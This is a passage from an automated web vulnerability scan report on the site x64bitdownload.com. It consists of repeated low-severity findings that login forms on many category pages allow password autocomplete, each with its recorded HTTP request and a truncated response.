Path:   /64-bit-file-grabber-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-file-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.217. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-file-sharing-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-file-sharing-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.218. http://www.x64bitdownload.com/64-bit-firefox-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-firefox-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-firefox-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:08:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22firefox%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97672


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.219. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-forum-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33899


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.220. http://www.x64bitdownload.com/64-bit-forum-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forum-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-forum-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:58 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91001


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.221. http://www.x64bitdownload.com/64-bit-forums-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forums-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-forums-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.222. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-google-groups-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-google-groups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22google-groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22google+groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.223. http://www.x64bitdownload.com/64-bit-grabber-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-grabber-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.224. http://www.x64bitdownload.com/64-bit-group-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-group-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-group-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.225. http://www.x64bitdownload.com/64-bit-groups-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-groups-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-groups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.226. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-highspeed-connection-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-highspeed-connection-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32070


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.227. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-image-grabber-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-image-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91637


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.228. http://www.x64bitdownload.com/64-bit-images-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-images-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-images-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.229. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-internet-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39465


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.230. http://www.x64bitdownload.com/64-bit-internet-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-internet-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-internet-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93902


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.231. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-kill-file-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-kill-file-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22kill-file%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22kill+file%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93504


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.232. http://www.x64bitdownload.com/64-bit-killfile-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-killfile-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-killfile-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.233. http://www.x64bitdownload.com/64-bit-mp3-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-mp3-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-mp3-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94965


